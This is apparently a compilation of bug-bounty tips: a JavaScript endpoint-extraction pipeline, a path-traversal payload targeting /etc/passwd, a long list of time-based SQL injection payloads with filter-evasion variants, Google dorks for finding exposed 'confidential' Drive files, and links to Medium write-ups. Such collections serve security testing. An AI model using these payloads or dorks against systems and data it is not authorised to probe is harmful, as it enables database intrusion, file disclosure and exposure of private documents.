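# Lists the URL-like strings found in the JavaScript files known for a domain,
# e.g. to inventory which endpoints and hosts a site's front-end code exposes.
#   gau    reads the domain on stdin and prints the URLs it knows for it,
#          skipping the static-asset extensions given to --blacklist
#   grep   keeps URLs whose path ends in .js, with or without a query string
#   httpx  requests each URL, keeps responses matching the JavaScript
#          content-type pattern (-mr) and records every match of the -er
#          regex in its JSON output
#   jq/tr  print the extracted strings; tr also deletes any '[', ']' or ','
#          inside a value, so URLs containing those characters come out altered
# "target.com" is a placeholder for the domain being assessed.
# Every stage is joined by a real pipe: an escaped "\|" would be handed to gau
# as a literal argument and grep would never run.
echo "target.com" \
  | gau --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg \
  | grep -E '\.js($|\?.*)' \
  | httpx -er "(?:(https?|ftp|git|ssh|telnet|smtp|imap|pop3|ldap|sftp|smb|nfs|rtmp|rtsp|ws|wss|irc|news|gopher|rsync|data):\/\/|\/)[^\s\"'\*\(\){};\\\^\$\&<>/\\?#]+(?:\?[^\s\"'<>/\\?#]+)?(?:\/[^\s\"'<>/\\?#]+)*" -json -mr "application/javascript|text/javascript" \
  | jq -r '.extracts[]' \
  | tr -d '[],'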
⚡Ultimate FFUF Cheat Sheet!
🔗https://medium.com/h7w/ultimate-ffuf-cheatsheet-advanced-fuzzing-tactics-for-pro-bug-hunters-492598750150
Intercept the request in Burp and replace the Accept header with: Accept: ../../../../../../../../../../etc/passwd{{
../../../../../../e*c/p*s*d{{
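Time-based SQL injection payloads for different DBMSs (MySQL sleep, MSSQL WAITFOR DELAY, PostgreSQL pg_sleep); a response delayed by about the requested interval means the input reached the SQL interpreter without being parameterized: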
XOR(if(now()=sysdate(),sleep(7),0))XOR%23
'or sleep(7)--#
'or sleep(7)#
'or sleep(7)='#
'or sleep(7)='--
'/*F*/or/*F*/sleep(7)='
'or sleep(7)--%23
'or sleep(7)%23
'or sleep(7);%00
or sleep(7)--+-
or sleep(7)#
'/*f*/or/*f*/sleep/*f*/(7)--#
'/*f*/or/*f*/sleep/*f*/(7)#
or sleep(7)%23
'/*f*/or/*f*/sleep/*f*/(7)--%23
'/*f*/or/*f*/sleep/*f*/(7)%23
'/*f*/or/*f*/sleep/*f*/(7);%00
or/*f*/sleep/*f*/(7)--+-
or/*f*/sleep/*f*/(7)#
'XOR(if(now()=sysdate(),sleep(7),0))XOR'
'OR(if(now()=sysdate(),sleep(7),0))--#
'OR(if(now()=sysdate(),sleep(7),0))#
or/*f*/sleep/*f*/(7)%23
'OR(if(now()=sysdate(),sleep(7),0))--%23
'OR(if(now()=sysdate(),sleep(7),0))%23
'OR(if(now()=sysdate(),sleep(7),0));%00
OR(if(now()=sysdate(),sleep(7),0))--+-
OR(if(now()=sysdate(),sleep(7),0))#
OR(if(now()=sysdate(),sleep(7),0))%23
'WAITFORDELAY'0:0:7';%00
'WAITFORDELAY'0:0:7'#
'WAITFORDELAY'0:0:7'%23
'WAITFORDELAY'0:0:7';%00
WAITFORDELAY'0:0:7'#
WAITFORDELAY'0:0:7'%23
WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'='
\/*F*/or/*f*/sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7)#
'/*f*/OR/*f*/pg_sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7);%00
/*f*/OR/*f*/pg_sleep(70)--+-
/*f*/OR/*f*/pg_sleep(70)#
/*f*/OR/*f*/pg_sleep(70)%23
'/*f*/OR/*f*/pg_sleep(7)=';%00
\)/*F*/or/*f*/sleep(7)%23
\)/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)--+-
%E2%84%A2\)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2%27)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2'/*F*/or/*f*/sleep(7)='
%E2%84%A2')/*F*/or/*f*/sleep(7)='
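# Fetch one page and print every absolute http(s) URL or www.-prefixed string in it.
# -sS hides curl's progress meter but still reports transfer errors.
# The scheme is matched as "https?" (the original "https*" also accepted
# "httpss://"), and a match stops at whitespace, quotes and angle brackets so
# HTML attribute delimiters are not glued onto the extracted link.
curl -sS "testphp.vulnweb.com" | grep -oP "(https?://|www\.)[^\s\"'<>]*"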
site:http://drive.google.com inurl:folder
site:http://drive.google.com inurl:open
site:http://docs.google.com inurl:d
site:http://drive.google.com "confidential"
site:http://docs.google.com inurl:d filetype:docx
If you hate wasting time with 2FA, try this:
1. Install github.com/rsc/2fa on your computer/VPS & configure it with your 2FA sites.
2. Install Espanso, then add the config below.
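Now, whenever you need an OTP, just type :otp and it’ll auto-fill. Easy and fast! Keep in mind that rsc/2fa stores the TOTP secrets in an unencrypted file in your home directory, so anyone who can read that file (for example on a shared or compromised VPS) can generate the same codes; restrict the file's permissions and keep it on a host only you control.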
Credit- sw33tLie
1. Install github.com/rsc/2fa on your computer/VPS & configure it with your 2FA sites.
2. Install Espanso, then add the config below.
Now, whenever you need an OTP, just type :otp and it’ll auto-fill. Easy and fast!
Credit- sw33tLie
From Broken Access Control to First Bounty: https://infosecwriteups.com/from-broken-access-control-to-first-bounty-01712b1dab53?source=rss------bug_bounty-5
Medium
From Broken Access Control to First Resolved Bug
In the Name of Allah, the Most Beneficent, the Most Merciful. All the praises and thanks be to Allah, the Lord of the ‘Alamin (mankind…
Bug Critical Flaw: Default Password to Super Admin!: https://medium.com/@firdansp/bug-critical-flaw-default-password-to-super-admin-ef20c4214231?source=rss------bug_bounty-5
Medium
🚨Bug Critical Flaw: Default Password to Super Admin!
Hello everyone,
API Pentesting: Broken Object Property Level Authorization: https://devilwrites.medium.com/api-pentesting-broken-object-property-level-authorization-21d65939ad24?source=rss------bug_bounty-5
Medium
API Pentesting: Broken Object Property Level Authorization
Basics of Broken Object Property Level Authorization
The Ultimate Checklist for Detecting IDOR and Broken Access Control Vulnerabilities: https://thexssrat.medium.com/the-ultimate-checklist-for-detecting-idor-and-broken-access-control-vulnerabilities-b1585dd4e999?source=rss------bug_bounty-5
Medium
The Ultimate Checklist for Detecting IDOR and Broken Access Control Vulnerabilities
When testing web applications for security vulnerabilities, Insecure Direct Object References (IDOR) and Broken Access Control (BAC) are…
Cross-Site Scripting (XSS): Techniques, Bypasses, and Detection: https://medium.com/@rootast/cross-site-scripting-xss-techniques-bypasses-and-detection-927af5a55d02?source=rss------bug_bounty-5
Medium
Cross-Site Scripting (XSS): Techniques, Bypasses, and Detection
Test All Input Fields:
- Start by testing every input field on the website. Check if the data you input is reflected back unsanitized in…
- Start by testing every input field on the website. Check if the data you input is reflected back unsanitized in…
Traditional Pentest vs. Bug Bounty Program: The Pros, The Cons, and How to Do It Right: https://medium.com/@hackrate/traditional-pentest-vs-bug-bounty-program-the-pros-the-cons-and-how-to-do-it-right-f2d8beff40bf?source=rss------bug_bounty-5
Medium
Traditional Pentest vs. Bug Bounty Program: The Pros, The Cons, and How to Do It Right
In the ever-evolving landscape of cybersecurity, businesses must stay one step ahead of potential threats to protect their assets, users…